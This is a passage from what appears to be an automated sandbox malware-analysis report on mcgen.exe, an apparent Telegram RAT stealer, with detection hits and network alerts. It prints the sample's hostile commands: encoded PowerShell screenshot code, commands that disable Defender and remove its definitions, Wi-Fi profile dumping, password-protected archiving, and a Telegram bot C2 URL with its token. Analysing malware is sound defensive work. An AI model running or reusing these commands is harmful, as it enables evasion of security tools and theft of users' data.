egBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 2912, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'", ProcessId: 6104, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7524, TargetFilename: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, ProcessId: 2300, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3196, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 4072, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 3660, ProcessName: cmd.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:22:41.094206+010028577521A Network Trojan was detected149.154.167.220443192.168.2.649894TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:22:39.750661+010028577511A Network Trojan was detected192.168.2.649894149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:22:39.750486+010018100081Potentially Bad Traffic192.168.2.649894149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: mcgen.exe.7020.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendMessage"}
              Source: mcgen.exeVirustotal: Detection: 44%Perma Link
              Source: mcgen.exeReversingLabs: Detection: 47%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,103_2_00007FF695CE901C
              Source: mcgen.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mcgen.exe, 00000002.00000002.2533004812.00007FFD93B77000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdbhP source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
